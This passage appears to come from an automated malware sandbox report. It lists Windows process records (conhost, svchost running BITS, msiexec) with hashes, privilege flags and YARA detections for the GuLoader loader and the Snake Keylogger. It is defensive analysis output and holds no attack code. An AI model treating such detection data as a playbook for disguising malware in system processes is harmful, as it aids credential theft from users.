                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1284819779.000000000A212000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:3
                                                                                                                                                                          Start time:10:19:57
                                                                                                                                                                          Start date:07/03/2025
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff6e60e0000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:4
                                                                                                                                                                          Start time:10:20:28
                                                                                                                                                                          Start date:07/03/2025
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                          Imagebase:0x7ff66acf0000
                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:5
                                                                                                                                                                          Start time:10:20:32
                                                                                                                                                                          Start date:07/03/2025
                                                                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                                                          Imagebase:0xc70000
                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2126368645.0000000005712000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Disassembly

                                                                                                                                                                          Reset < >